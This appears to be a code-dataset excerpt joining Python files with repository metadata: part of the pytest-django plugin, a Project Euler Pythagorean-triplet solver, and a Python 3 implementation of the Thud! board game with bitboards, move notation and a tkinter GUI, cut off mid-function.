def _django_setup_unittest(request, _django_cursor_wrapper):
"""Setup a django unittest, internal to pytest-django."""
if django_settings_is_configured() and is_django_unittest(request):
request.getfuncargvalue('_django_test_environment')
request.getfuncargvalue('_django_db_setup')
_django_cursor_wrapper.enable()
request.node.cls.__real_setUpClass()
def teardown():
request.node.cls.__real_tearDownClass()
_django_cursor_wrapper.restore()
request.addfinalizer(teardown)
@pytest.fixture(autouse=True, scope='function')
def _django_clear_outbox():
"""Clear the django outbox, internal to pytest-django."""
if django_settings_is_configured():
from django.core import mail
mail.outbox = []
@pytest.fixture(autouse=True, scope='function')
def _django_set_urlconf(request):
"""Apply the @pytest.mark.urls marker, internal to pytest-django."""
marker = request.keywords.get('urls', None)
if marker:
skip_if_no_django()
import django.conf
from django.core.urlresolvers import clear_url_caches
validate_urls(marker)
original_urlconf = django.conf.settings.ROOT_URLCONF
django.conf.settings.ROOT_URLCONF = marker.urls
clear_url_caches()
def restore():
django.conf.settings.ROOT_URLCONF = original_urlconf
request.addfinalizer(restore)
# ############### Helper Functions ################
class CursorManager(object):
"""Manager for django.db.backends.util.CursorWrapper.
This is the object returned by _django_cursor_wrapper.
If created with None as django.db.backends.util the object is a
no-op.
"""
def __init__(self, dbutil):
self._dbutil = dbutil
self._history = []
self._real_wrapper = dbutil.CursorWrapper
def _save_active_wrapper(self):
return self._history.append(self._dbutil.CursorWrapper)
def _blocking_wrapper(*args, **kwargs):
__tracebackhide__ = True
__tracebackhide__ # Silence pyflakes
pytest.fail('Database access not allowed, '
'use the "django_db" mark to enable it.')
def enable(self):
"""Enable access to the Django database."""
self._save_active_wrapper()
self._dbutil.CursorWrapper = self._real_wrapper
def disable(self):
"""Disable access to the Django database."""
self._save_active_wrapper()
self._dbutil.CursorWrapper = self._blocking_wrapper
def restore(self):
self._dbutil.CursorWrapper = self._history.pop()
def __enter__(self):
self.enable()
def __exit__(self, exc_type, exc_value, traceback):
self.restore()
def validate_django_db(marker):
"""Validate the django_db marker.
It checks the signature and creates the `transaction` attribute on
the marker which will have the correct value.
"""
def apifun(transaction=False):
marker.transaction = transaction
apifun(*marker.args, **marker.kwargs)
def validate_urls(marker):
"""Validate the urls marker.
It checks the signature and creates the `urls` attribute on the
marker which will have the correct value.
"""
def apifun(urls):
marker.urls = urls
apifun(*marker.args, **marker.kwargs)
| {
"repo_name": "hoh/pytest-django",
"path": "pytest_django/plugin.py",
"copies": "2",
"size": "13006",
"license": "bsd-3-clause",
"hash": -4472727649412337000,
"line_mean": 31.9265822785,
"line_max": 79,
"alpha_frac": 0.6264800861,
"autogenerated": false,
"ratio": 4.169926258416159,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5796406344516158,
"avg_score": null,
"num_lines": null
} |
# A Pythagorean triplet is a set of three natural numbers, a < b < c, for which,
#
# a2 + b2 = c2
# For example, 3**2 + 4**2 = 9 + 16 = 25 = 5**2.
#
# There exists exactly one Pythagorean triplet for which a + b + c = 1000.
# Find the product abc.
from Problem import Problem
class SpecialPythagoreanTriplet(Problem):
def __init__(self):
self.answer = 31875000
def do(self):
t = self.find_p_triplet(1000, list(range(1, 1000)))
return t[0] * t[1] * t[2]
# check if triplet is pythagorean
def is_p_triplet(self, triplet):
x = triplet[0]
y = triplet[1]
z = triplet[2]
if x**2 + y**2 == z**2 or x**2 + z**2 == y**2 or z**2 + y**2 == x**2:
return True
return False
def find_p_triplet(self, x, candidates):
ret = []
for c0 in candidates:
for c1 in candidates:
if c0 + c1 >= x:
break
if self.is_p_triplet((c0, c1, x - (c0 + c1))):
return c0, c1, 1000 - (c0 + c1)
return ret
| {
"repo_name": "hperreault/ProjectEuler",
"path": "009_SpecialPythagoreanTriplet.py",
"copies": "1",
"size": "1079",
"license": "mit",
"hash": -5948408032026635000,
"line_mean": 26.6666666667,
"line_max": 80,
"alpha_frac": 0.5143651529,
"autogenerated": false,
"ratio": 3.0480225988700567,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8932599844204371,
"avg_score": 0.02595758151313707,
"num_lines": 39
} |
"""A python3 implementation of the Thud! boardgame
"""
__author__ = "William Dizon"
__license__ = "MIT License"
__version__ = "1.8.0"
__email__ = "wdchromium@gmail.com"
from array import array
import math
import itertools
class NoMoveException(Exception):
'''A user-defined exception class.'''
def __init__(self, token):
Exception.__init__(self)
self.token = token
class InfluenceMap:
BOARD_WIDTH = 17
def __init__(self, add, subtract):
imported_board = array('B')
for x in list(str(add)): imported_board.append(int(x))
imported_board2 = array('B')
for x in list(str(subtract)): imported_board2.append(int(x))
self.influence_map = array('B')
for x in range(InfluenceMap.BOARD_WIDTH**2): self.influence_map.append(0)
for i,v in enumerate(imported_board):
if int(v):
self.hit(i, 6)
for i,v in enumerate(imported_board2):
if int(v):
self.hit(i, -6)
def __getitem__(self, key):
return self.influence_map[key]
def hit(self, pos, value=6):
for i in itertools.product([-3,-2,-1,0,1,2,3], repeat=2):
try:
position = (pos + (i[0] * 1) + (i[1] * InfluenceMap.BOARD_WIDTH))
if position % 17 == 0 or \
position % 17 == 16 or \
position < 17 or \
position > 271:
pass
else:
self.influence_map[position] += value // max(abs(i[0]),abs(i[1]),1)
except:
pass
def highest(self, variance_pct=0):
highest = max(self.influence_map)
candidates = []
for i,v in enumerate(self.influence_map):
if v >= highest * (1-variance_pct):
candidates.append(i)
return candidates
def display(self):
for i, v in enumerate(self.influence_map):
if not i % self.BOARD_WIDTH: print()
print(str(v).rjust(3), end='')
class Bitboard:
BOARD_WIDTH = 17
def __init__(self, positions=[]):
self.x, self.value = 0, 0
for i in positions:
self.value += 1 << (Bitboard.BOARD_WIDTH**2 - i - 1)
def __str__(self):
s = bin(self.value)
if s.startswith('-',0,1):
s = s.lstrip('-0b').zfill(Bitboard.BOARD_WIDTH**2)
s = s.replace('1','2').replace('0','1').replace('2','0')
return s[:-1] + '1'
return s.lstrip('0b').zfill(Bitboard.BOARD_WIDTH**2)
def __len__(self):
return str(self).lstrip('-0b').count('1')
def __getitem__(self, key):
return str(self)[key]
def __iter__(self):
return self
def __next__(self):
self.x += 1
if self.x > Bitboard.BOARD_WIDTH**2:
self.x = 0
raise StopIteration
return self[self.x - 1]
def __lshift__(self, other):
new_board = Bitboard()
new_board.value = self.value << other
return new_board
def __rshift__(self, other):
new_board = Bitboard()
new_board.value = self.value >> other
return new_board
def __and__(self, other):
new_board = Bitboard()
new_board.value = self.value & other.value
return new_board
def __or__(self, other):
new_board = Bitboard()
new_board.value = self.value | other.value
return new_board
def __invert__(self):
new_board = Bitboard.create(self.value)
new_board.value = ~new_board.value
return new_board
def __bool__(self):
return bool(len(self))
def get_bits(self):
for i, v in enumerate(str(self)):
if int(v):
yield i
@staticmethod
def create(integer):
new_board = Bitboard()
new_board.value = integer
return new_board
class Ply:
"""Implements game-notation fragments"""
abbr = { 'dwarf': 'd', 'd': 'd',
'troll': 'T', 'T': 'T',
'thudstone': 'R', 'R': 'R' }
to_letter = {1: 'A', 2: 'B', 3: 'C', 4: 'D', 5: 'E',
6: 'F', 7: 'G', 8: 'H', 9: 'J', 10:'K',
11:'L', 12:'M', 13:'N', 14:'O', 15:'P' }
to_number = {'A': 1, 'B': 2, 'C': 3, 'D': 4, 'E': 5,
'F': 6, 'G': 7, 'H': 8, 'J': 9, 'K': 10,
'L': 11,'M': 12,'N': 13,'O': 14,'P': 15 }
def __init__(self, token, origin, dest, captured=[]):
self.token = token
self.origin = origin
self.dest = dest
self.captured = captured
self.score = -100
def __str__(self):
def make_capstring(captures):
cap_string = []
for cap in captures:
cap_string.append('x' + self.position_to_notation(cap))
return ''.join(cap_string)
return str(self.abbr.get(self.token)) + \
str(self.position_to_notation(self.origin)) + '-' + \
str(self.position_to_notation(self.dest)) + \
make_capstring(self.captured)
def __eq__(self, other):
if self.score == other.score:
return True
def __lt__(self, other):
if self.score < other.score:
return True
def __hash__(self):
for i,v in self.captured:
caps += (v << ((i+2)*9))
return (self.origin) + (self.dest << 9) + caps
def __bool__(self):
if self.token and self.origin and self.dest:
return True
return False
@staticmethod
def position_to_tuple(position):
rank = position // 17
file = position - (rank * 17)
return (file, rank)
@staticmethod
def position_to_notation(position):
conv = Ply.position_to_tuple(position)
file = Ply.to_letter.get(int(conv[0]))
rank = str(int(conv[1]))
return file + rank
@staticmethod
def notation_to_position(notation):
file = Ply.to_number.get(notation[0])
return file + int(notation[1:]) * 17
@staticmethod
def tuple_to_position(notation):
return notation[1] * 17 + notation[0]
@staticmethod
def calc_pythagoras(a_pos, b_pos):
a = Ply.position_to_tuple(a_pos)
b = Ply.position_to_tuple(b_pos)
return math.sqrt(pow(a[0] - b[0],2) + pow(a[1] - b[1],2))
@staticmethod
def parse_string(ply_notation):
"""Accepts a string indicating a full move, parses into a ply"""
import re
side = { 'd': 'dwarf',
'T': 'troll',
'R': 'thudstone' }
REGEX_NOTATION_PLY = r"([T|d|R]) ?([A-HJ-P])([0-9]+)-([A-HJ-P])([0-9]+)(.*)"
compiled_notation = re.compile(REGEX_NOTATION_PLY)
m = compiled_notation.search(str(ply_notation))
if m:
return Ply(side.get(m.group(1)), \
Ply.notation_to_position(m.group(2) + m.group(3)), \
Ply.notation_to_position(m.group(4) + m.group(5)), \
list(map(Ply.notation_to_position, m.group(6).split('x')[1:])))
| {
"repo_name": "hexparrot/thudgame",
"path": "thudclasses.py",
"copies": "1",
"size": "7225",
"license": "mit",
"hash": 6730677030674622000,
"line_mean": 29.3571428571,
"line_max": 87,
"alpha_frac": 0.5031141869,
"autogenerated": false,
"ratio": 3.4836065573770494,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9430580380089164,
"avg_score": 0.011228072837577126,
"num_lines": 238
} |
"""A python3 implementation of the Thud! boardgame
"""
__author__ = "William Dizon"
__license__ = "MIT License"
__version__ = "1.8.0"
__email__ = "wdchromium@gmail.com"
from thudclasses import *
from thud import *
import copy
import tkinter
import tkinter.filedialog
import math
import re
import itertools
import random
import sys
import threading
class RepeatTimer(threading.Thread):
"""
This borrowed class repeats at 1 second intervals to see if it is a
computer's turn to act on behalf of the troll/dwarf.
# Copyright (c) 2009 Geoffrey Foster
# http://g-off.net/software/a-python-repeatable-threadingtimer-class
"""
def __init__(self, interval, function, iterations=0, args=[], kwargs={}):
threading.Thread.__init__(self)
self.interval = interval
self.function = function
self.iterations = iterations
self.args = args
self.kwargs = kwargs
self.finished = threading.Event()
def run(self):
count = 0
while not self.finished.is_set() and (self.iterations <= 0 or count < self.iterations):
self.finished.wait(self.interval)
if not self.finished.is_set():
self.function(*self.args, **self.kwargs)
count += 1
def cancel(self):
self.finished.set()
class DesktopGUI(tkinter.Frame):
"""Implements the main desktop GUI"""
def __init__(self, master):
master.title('Thud')
self.sprites = {}
self.sprite_lifted = False
self.review_mode = False
self.selection_mode = 'false'
self.selected_pieces = []
self.displayed_ply = 0
self.delay_ai = False
self.compulsory_capturing = tkinter.BooleanVar()
self.allow_illegal_play = tkinter.BooleanVar()
self.cpu_troll = tkinter.BooleanVar()
self.cpu_dwarf = tkinter.BooleanVar()
self.alt_iconset = tkinter.BooleanVar()
self.lookahead_count = 3
self.draw_ui(master)
self.user_notice.set("")
self.compulsory_capturing.set(True)
self.allow_illegal_play.set(False)
self.alt_iconset.set(False)
def draw_ui(self, master):
"""Loads all the images and widgets for the UI"""
BOARD_SIZE = 600
self.square_size = int(BOARD_SIZE / 15)
self.image_board = tkinter.PhotoImage(file='tb.gif')
self.image_troll = tkinter.PhotoImage(file='rook.gif')
self.image_dwarf = tkinter.PhotoImage(file='pawn.gif')
self.image_thudstone = tkinter.PhotoImage(file='thudstone.gif')
#notation list box and scroll bars
self.scrollbar = tkinter.Scrollbar(master, orient='vertical')
self.listbox = tkinter.Listbox(master, yscrollcommand=self.scrollbar.set)
self.listbox.config(width=30, font=("Courier", 10), selectmode='single')
self.scrollbar.config(command=self.listbox.yview)
self.scrollbar.pack(side='right', fill='y')
self.listbox.pack(side='right', fill='both', expand=1)
#"status bar" frame
self.canvas = tkinter.Canvas(root, width=BOARD_SIZE, height=BOARD_SIZE)
self.canvas.pack(expand=True)
self.clear_sprites_all()
self.subframe = tkinter.Frame(master, height=50, borderwidth=2, relief='groove')
self.subframe.pack(side='bottom')
self.subframe2 = tkinter.Frame(self.subframe, height=50, borderwidth=2, relief='raised')
self.subframe2.pack(side='right')
#"status bar" labels for images and piece counts
self.dwarf_count = tkinter.StringVar()
self.troll_count = tkinter.StringVar()
self.user_notice = tkinter.StringVar()
self.subframe_label = tkinter.Label(master, textvariable=self.user_notice, width=80)
self.subframe_label.pack(side='left')
self.d = tkinter.Label(self.subframe, image=self.image_dwarf)
self.d.pack(side='left')
tkinter.Label(self.subframe, textvariable=self.dwarf_count).pack(side='left')
self.t = tkinter.Label(self.subframe, image=self.image_troll)
self.t.pack(side='left')
tkinter.Label(self.subframe, textvariable=self.troll_count).pack(side='left')
#playback controls
self.subframe2_button1 = tkinter.Button(self.subframe2, text="|<<")
self.subframe2_button1.pack(side='left')
self.subframe2_button2 = tkinter.Button(self.subframe2, text=" < ")
self.subframe2_button2.pack(side='left')
self.subframe2_button3 = tkinter.Button(self.subframe2, text=" > ")
self.subframe2_button3.pack(side='left')
self.subframe2_button4 = tkinter.Button(self.subframe2, text=">>|")
self.subframe2_button4.pack(side='left')
#playback bindings
self.subframe2_button1.bind('<Button-1>', self.goto_ply)
self.subframe2_button2.bind('<Button-1>', self.goto_ply)
self.subframe2_button3.bind('<Button-1>', self.goto_ply)
self.subframe2_button4.bind('<Button-1>', self.goto_ply)
menubar = tkinter.Menu(root)
root.config(menu=menubar)
game_dropdown = tkinter.Menu(menubar)
option_dropdown = tkinter.Menu(menubar)
#menubar dropdowns
menubar.add_cascade(label="Game", menu=game_dropdown)
menubar.add_cascade(label="Options", menu=option_dropdown)
game_dropdown.new_branch = tkinter.Menu(game_dropdown)
game_dropdown.add_cascade(label='New',menu=game_dropdown.new_branch)
game_dropdown.new_branch.add_command(label='Classic', command=self.newgame_classic)
game_dropdown.new_branch.add_command(label='Koom Valley', command=self.newgame_kvt)
game_dropdown.new_branch.add_command(label='Klash', command=self.newgame_klash)
game_dropdown.new_branch2 = tkinter.Menu(game_dropdown)
game_dropdown.add_cascade(label='CPU Controlled',menu=game_dropdown.new_branch2)
game_dropdown.new_branch2.add_checkbutton(label='Troll', variable=self.cpu_troll)
game_dropdown.new_branch2.add_checkbutton(label='Dwarf', variable=self.cpu_dwarf)
game_dropdown.add_command(label='Open', command=self.file_opengame)
game_dropdown.add_command(label='Save', command=self.file_savegame)
game_dropdown.add_command(label='Exit', command=sys.exit)
option_dropdown.add_checkbutton(label='Compulsory Capturing', \
variable=self.compulsory_capturing)
option_dropdown.add_checkbutton(label='Allow Illegal Moves', \
variable=self.allow_illegal_play)
option_dropdown.add_checkbutton(label='Alternative Iconset', \
variable=self.alt_iconset, \
command=self.change_iconset)
def change_iconset(self):
"""
Toggles between the chess piece icon set or the iconset
for the previous thud application. Freely available source & use.
# Copyright Marc Boeren
# http://www.million.nl/thudboard/
"""
try:
if self.alt_iconset.get():
self.image_troll = tkinter.PhotoImage(file='troll.gif')
self.image_dwarf = tkinter.PhotoImage(file='dwarf.gif')
self.image_thudstone = tkinter.PhotoImage(file='rock.gif')
self.d.configure(image=self.image_dwarf)
self.t.configure(image=self.image_troll)
else:
self.image_troll = tkinter.PhotoImage(file='rook.gif')
self.image_dwarf = tkinter.PhotoImage(file='pawn.gif')
self.image_thudstone = tkinter.PhotoImage(file='thudstone.gif')
self.d.configure(image=self.image_dwarf)
self.t.configure(image=self.image_troll)
except Exception as e:
print(e)
self.user_notice.set("Required files not found--maintaining iconset")
self.alt_iconset.set(not self.alt_iconset.get())
self.change_iconset()
self.sync_sprites()
def goto_ply(self, event):
"""Advances or reverses game based on playback widgets"""
button_clicked = {
self.subframe2_button1: 0,
self.subframe2_button2: max(self.displayed_ply - 1, 0),
self.subframe2_button3: min(self.displayed_ply + 1, len(self.board.ply_list) - 1),
self.subframe2_button4: len(self.board.ply_list) - 1
}[event.widget]
self.play_out_moves(self.board.ply_list, button_clicked)
def update_ui(self):
"""Updates UI piece count to reflect current live pieces"""
self.dwarf_count.set("Dwarfs Remaining: " + str(len(self.board.dwarfs)))
self.troll_count.set("Trolls Remaining: " + str(len(self.board.trolls)))
self.user_notice.set("")
def file_opengame(self):
"""Displays file dialog and then plays out game to end"""
side = { 'd': 'dwarf',
'T': 'troll',
'R': 'thudstone' }
self.cpu_troll.set(False)
self.cpu_dwarf.set(False)
imported_plies = []
regex_ply_notation = r"([T|d|R])([A-HJ-P][0-9]+)-([A-HJ-P][0-9]+)(.*)"
compiled_notation = re.compile(regex_ply_notation)
filename = tkinter.filedialog.askopenfilename(title="Open Thudgame", \
multiple=False, \
filetypes=[('thud-game files', '*.thud')])
if not filename:
return
with open(filename, "r") as thud_file:
for i,line in enumerate(thud_file):
m = compiled_notation.search(line)
if m:
p = Ply(side.get(m.group(1)), \
Ply.notation_to_position(m.group(2)), \
Ply.notation_to_position(m.group(3)), \
list(map(Ply.notation_to_position, m.group(4).split('x')[1:])))
imported_plies.append(p)
else:
piece_list = line.split(',')
if len(piece_list) == 41 or len(piece_list) == 40:
self.board.ruleset = 'classic'
elif 'dH9' in piece_list:
self.board.ruleset = 'kvt'
else:
self.board.ruleset = 'klash'
self.displayed_ply = 0
if self.play_out_moves(imported_plies, len(imported_plies) - 1):
self.play_out_moves(imported_plies, 0)
def file_savegame(self):
"""Opens save dialog box and exports moves to text file (.thud)"""
def tostr(token, piece_list):
'''pc_string = []
for np in piece_list:
pc_string.append(token + str(np))'''
pc_string = map(Ply.position_to_notation, piece_list)
return (','+token).join(pc_string)
filename = tkinter.filedialog.asksaveasfilename(title="Save Thudgame", \
filetypes=[('thud-game files', '*.thud')])
if not filename:
return
try:
f = open(filename, 'w')
first_string = 'd' + tostr('d',self.board.get_default_positions('dwarf', self.board.ruleset))
first_string += ',T' + tostr('T',self.board.get_default_positions('troll', self.board.ruleset))
first_string += ',R' + tostr('R',self.board.get_default_positions('thudstone', self.board.ruleset))
f.write(first_string + '\n')
for k in self.board.ply_list:
f.write(str(k) + '\n')
except:
pass
def sync_sprites(self):
"""Clears all loaded sprites and reloads according to current game positions"""
self.clear_sprites_all()
for i in self.board.trolls.get_bits():
self.create_sprite('troll', i)
for i in self.board.dwarfs.get_bits():
self.create_sprite('dwarf', i)
for i in self.board.thudstone.get_bits():
self.create_sprite('thudstone', i)
def create_sprite(self, token, position):
"""Creates a sprite at the given notation and binds mouse events"""
if token == 'troll':
sprite = self.canvas.create_image(0,0, image=self.image_troll, anchor='nw')
elif token == 'dwarf':
sprite = self.canvas.create_image(0,0, image=self.image_dwarf, anchor='nw')
elif token == 'thudstone':
sprite = self.canvas.create_image(0,0, image=self.image_thudstone, anchor='nw')
self.canvas.tag_bind(sprite, "<Button-1>", self.mouseDown)
self.canvas.tag_bind(sprite, "<B1-Motion>", self.mouseMove)
self.canvas.tag_bind(sprite, "<ButtonRelease-1>", self.mouseUp)
self.sprites[position] = sprite
self.move_sprite(sprite, position)
def move_sprite(self, sprite, position):
"""Moves a piece to destination, resetting origin square to empty"""
file, rank = Ply.position_to_tuple(position)
self.canvas.coords(sprite, \
self.square_size * (file - 1), \
self.square_size * (rank - 1))
self.sprites[position] = sprite
def clear_sprite(self, sprite):
"""Removes sprite from canvas"""
self.canvas.delete(sprite)
def clear_sprites_all(self):
"""Removes all sprites on the canvas and re-adds gameboard image"""
self.canvas.delete(self.canvas.find_all())
board = self.canvas.create_image(0, 0, image=self.image_board, anchor='nw')
self.canvas.tag_bind(board, "<Button-1>", self.boardClick)
def newgame_classic(self):
"""Menu handler for creating a new classic game"""
self.newgame_common('classic')
def newgame_kvt(self):
"""Menu handler for creating a new kvt game"""
self.newgame_common('kvt')
def newgame_klash(self):
"""Menu handler for creating a new klash game"""
self.newgame_common('klash')
def newgame_common(self, ruleset='classic'):
"""Executes common commands for creating a new game"""
self.board = Gameboard(ruleset)
self.sync_sprites()
self.listbox.delete(0, 'end')
self.update_ui()
self.review_mode = False
def boardClick(self, event):
"""Responds to clicks that DO not occur by sprite (used for troll materialization"""
notation = (int(event.x // self.square_size), int(event.y // self.square_size))
position = notation[1] * self.board.BOARD_WIDTH + \
notation[0] + self.board.BOARD_WIDTH + 1
if self.allow_illegal_play.get() or \
(self.board.ruleset == 'klash' and \
self.board.turn_to_act() == 'troll' and \
self.board.klash_trolls < 6) and \
position in self.board.get_default_positions('troll', 'classic'):
ply = Ply('troll', position, position, '')
self.board.add_troll(position)
self.board.ply_list.append(ply)
self.notate_move(ply)
self.sync_sprites()
def mouseDown(self, event):
"""This function will record the notation of all clicks
determined to have landed on a sprite (see create_piece) """
self.posx = event.x
self.posy = event.y
pickup_notation = (int(event.x // self.square_size), \
int(event.y // self.square_size))
self.pickup = pickup_notation[1] * self.board.BOARD_WIDTH + \
pickup_notation[0] + self.board.BOARD_WIDTH + 1
if self.review_mode:
return
elif self.cpu_troll.get() and self.board.turn_to_act() == 'troll' or \
self.cpu_dwarf.get() and self.board.turn_to_act() == 'dwarf':
return
elif self.board.ruleset == 'kvt' and \
self.board.ply_list and \
self.board.ply_list[-1].token == 'troll' and \
self.board.ply_list[-1].captured:
if self.board.ply_list[-2].token == 'troll' and \
self.board.ply_list[-3].token == 'troll' and \
int(self.board.trolls[self.pickup]):
return
self.sprite_lifted = True
self.canvas.tag_raise('current')
elif self.selection_mode == 'selecting' or \
self.allow_illegal_play.get() or \
self.board.game_winner or \
self.board.token_at(self.pickup) == self.board.turn_to_act() or \
(int(self.board.thudstone[self.pickup]) and \
self.board.turn_to_act() == 'dwarf' and \
self.board.ruleset == 'kvt'):
self.sprite_lifted = True
self.canvas.tag_raise('current')
def mouseMove(self, event):
"""Activated only on a mouseDown-able sprite, this keeps the piece attached to the mouse"""
if self.sprite_lifted:
self.canvas.move('current', event.x - self.posx, event.y - self.posy)
self.posx = event.x
self.posy = event.y
def mouseUp(self, event):
"""
After piece is dropped, call logic function and execute/revert move.
This function also handles manual selection (noncompulsory capture) logic.
"""
dropoff_notation = (int(event.x // self.square_size),
int(event.y // self.square_size))
self.dropoff = dropoff_notation[1] * self.board.BOARD_WIDTH + \
dropoff_notation[0] + self.board.BOARD_WIDTH + 1
if not self.sprite_lifted:
return
elif not self.compulsory_capturing.get():
if self.selection_mode == 'false':
valid = self.board.validate_move(self.pickup, self.dropoff)
if valid[2]:
self.user_notice.set("Select each piece to be captured and click capturing piece to finish.")
self.selected_pieces = []
self.selection_mode = 'selecting'
self.pickup_remembered = self.pickup
self.dropoff_remembered = self.dropoff
elif valid[0]:
self.execute_ply(Ply(self.board.token_at(self.pickup), \
self.pickup, \
self.dropoff, \
[]))
else:
self.move_sprite(self.sprites[self.pickup], \
self.pickup)
elif self.selection_mode == 'selecting':
self.user_notice.set("Piece at " + str(self.dropoff) + " selected")
self.selected_pieces.append(self.dropoff)
if self.dropoff == self.dropoff_remembered:
self.selection_mode = 'false'
valid = self.check_logic(Ply(self.board.token_at(self.pickup_remembered), \
self.pickup_remembered, \
self.dropoff_remembered,
self.selected_pieces))
if valid[0]:
self.execute_ply(valid[1])
self.board.game_winner = self.board.get_game_outcome()
else:
self.move_sprite(self.sprites[self.pickup_remembered], \
self.pickup_remembered)
else:
valid = self.check_logic(Ply(self.board.token_at(self.pickup), \
self.pickup, \
self.dropoff, \
[]))
if valid[0]:
self.execute_ply(valid[1])
self.board.game_winner = self.board.get_game_outcome()
else:
self.move_sprite(self.sprites[self.pickup], \
self.pickup)
if self.board.game_winner != None:
self.review_mode = True
self.user_notice.set(str(self.board.game_winner) + ' win!')
self.sprite_lifted = False
def check_logic(self, ply):
"""
Returns the submitted PLY if move/capture is legal else,
return None-filled Ply, which will revert attemtped move on UI.
"""
result = self.board.validate_move(ply.origin, ply.dest)
if self.allow_illegal_play.get():
result = {
True: (True, True, ply.captured),
False:(True, False, [])
}[bool(ply.captured)]
if result[1] or result[0]:
if self.compulsory_capturing.get():
approved_captures = result[2]
else:
approved_captures = set(ply.captured).intersection(set(result[2]))
#if it would be a legal capture move, but no captures selected, invalid ply
if not result[0] and result[1] and not approved_captures:
return (False, Ply(None,None,None,None))
#if a legal move, but not a legal capture, but capture is notated, invalid ply
if result[0] and not result[1] and ply.captured:
return (False, Ply(None,None,None,None))
return (True, Ply(self.board.token_at(ply.origin), ply.origin, ply.dest, approved_captures))
return (False, Ply(None,None,None,None))
def execute_ply(self, fullply):
"""Shortcut function to execute all backend updates along with UI sprites"""
for target in fullply.captured:
self.clear_sprite(self.sprites[target])
self.move_sprite(self.sprites[fullply.origin], fullply.dest)
self.board.apply_ply(fullply)
self.board.ply_list.append(fullply)
self.notate_move(fullply)
self.displayed_ply = len(self.board.ply_list) - 1
def play_out_moves(self, ply_list, stop_at):
def is_review_mode(last_ply):
if last_ply >= len(self.board.ply_list) - 1:
return False
return True
def notate_append(ply):
self.board.ply_list.append(ply)
self.notate_move(ply)
"""Go through ply list and execute each until stop_at number"""
self.cpu_troll.set(False)
self.cpu_dwarf.set(False)
self.newgame_common(self.board.ruleset)
for a, b in enumerate(ply_list):
if a <= stop_at:
valid = self.board.validate_move(b.origin,b.dest)
if self.allow_illegal_play.get():
self.board.apply_ply(b)
notate_append(b)
continue
if len(b.captured) > len(valid[2]):
#if game notation is broken, and displays broken ply
notate_append(b)
self.user_notice.set('Illegal move/capture attempt at move: ' + \
str((a+2.0)/2.0) + \
". Enable 'allow illegal moves' to see game as notated.")
return False
elif valid[0] or valid[1]:
#valid move or cap
self.board.apply_ply(b)
notate_append(b)
elif not valid[0] and not valid[1] and valid[2]:
#materializing troll
self.board.add_troll(b.origin)
notate_append(b)
else:
notate_append(b)
self.sync_sprites()
self.listbox.see(stop_at)
self.displayed_ply = stop_at
self.review_mode = is_review_mode(stop_at)
return True
def notate_move(self, ply):
"""Add move to the listbox of moves"""
ply_num = str((len(self.board.ply_list) + 1)/2).ljust(5)
self.listbox.insert('end', ply_num + str(ply))
# Colorize alternating lines of the listbox
for i in range(0,self.listbox.size(),2):
self.listbox.itemconfigure(i, background='#f0f0ff')
self.listbox.bind('<<ListboxSelect>>', self.click_listbox_left)
self.listbox.yview_moveto(1.0)
self.update_ui()
def click_listbox_left(self, event):
"""Retrieves the clicked ply and play_out_move till that point"""
try:
self.displayed_ply = int(self.listbox.curselection()[0])
except:
self.displayed_ply = len(self.board.ply_list) - 1
self.play_out_moves(self.board.ply_list, self.displayed_ply)
def is_cpu_turn(self):
"""
This is the function called 1/second to determine if CPU AI
should begin calculating potential moves.
"""
if self.cpu_troll.get() and self.board.turn_to_act() == 'troll' or \
self.cpu_dwarf.get() and self.board.turn_to_act() == 'dwarf' and \
not self.delay_ai and not self.review_mode and not self.board.game_winner:
self.delay_ai = True
self.user_notice.set("Computer is thinking...")
try:
ai_thread = threading.Thread(target=AIEngine.calculate_best_move(self.board, \
self.board.turn_to_act(), \
self.lookahead_count))
ai_thread.start()
ai_thread.join()
self.execute_ply(ai.decision)
self.delay_ai = False
except NoMoveException as ex:
print("{0} has no moves available.".format(ex.token))
self.delay_ai = True
finally:
self.board.game_winner = self.board.get_game_outcome()
if not self.board.game_winner:
self.user_notice.set("")
class tkinter_game:
def simulate_set(self, trials=5):
results = []
for i in range(trials):
results.append(self.simulate_game())
print(results)
def simulate_game(self):
global ui
print('game in progress...')
ui.newgame_classic()
ui.cpu_troll.set(True)
ui.cpu_dwarf.set(True)
while not ui.board.game_winner:
ui.is_cpu_turn()
if not len(ui.board.ply_list) % 10:
print('Ply {0}: trolls {1} to dwarf {2}'.format( \
len(ui.board.ply_list), \
len(ui.board.trolls), \
len(ui.board.dwarfs)))
print('{0} win! trolls {1} to dwarf {2}'.format(ui.board.game_winner, \
len(ui.board.trolls), \
len(ui.board.dwarfs)))
return ui.board.game_winner
def play_game(self):
global ui
global root
ui.newgame_classic()
r = RepeatTimer(.2, ui.is_cpu_turn)
r.start()
root.mainloop()
if __name__ == '__main__':
root = tkinter.Tk()
root.wm_resizable(0,0)
ui = DesktopGUI(root)
game = tkinter_game()
game.play_game()
#game.simulate_set(15)
| {
"repo_name": "hexparrot/thudgame",
"path": "gui.py",
"copies": "1",
"size": "27466",
"license": "mit",
"hash": 5732989192608114000,
"line_mean": 42.4588607595,
"line_max": 113,
"alpha_frac": 0.5553411491,
"autogenerated": false,
"ratio": 3.779551396724921,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9796506196079696,
"avg_score": 0.007677269949044898,
"num_lines": 632
} |
"""A python3 implementation of the Thud! boardgame
"""
__author__ = "William Dizon"
__license__ = "MIT License"
__version__ = "1.8.0"
__email__ = "wdchromium@gmail.com"
from thudclasses import *
import copy
import math
import re
import itertools
import random
import sys
import threading
import logging
import sys
ai_log = logging.getLogger('ai_logger')
ai_log.setLevel(logging.INFO)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(levelname)s: %(message)s'))
ai_log.addHandler(handler)
class Gameboard:
def __init__(self, ruleset='classic'):
self.BOARD_WIDTH = Bitboard.BOARD_WIDTH
self.ruleset = ruleset
self.ply_list = []
self.game_winner = None
self.klash_trolls = 0
self.playable = self.get_default_board('playable', ruleset)
self.trolls = self.get_default_board('troll', ruleset)
self.dwarfs = self.get_default_board('dwarf', ruleset)
self.thudstone = self.get_default_board('thudstone', ruleset)
def turn_to_act(self):
"""
Returns token of allowed player move.
This is only relevant on classic/klash since KVT
has additional rules allowing trolls to make multicaptures.
"""
return len(self.ply_list) % 2 and 'troll' or 'dwarf'
def display(self, board):
"""Formats the 17x17 string from str(bitboard) to the debug output"""
for i, v in enumerate(str(board)):
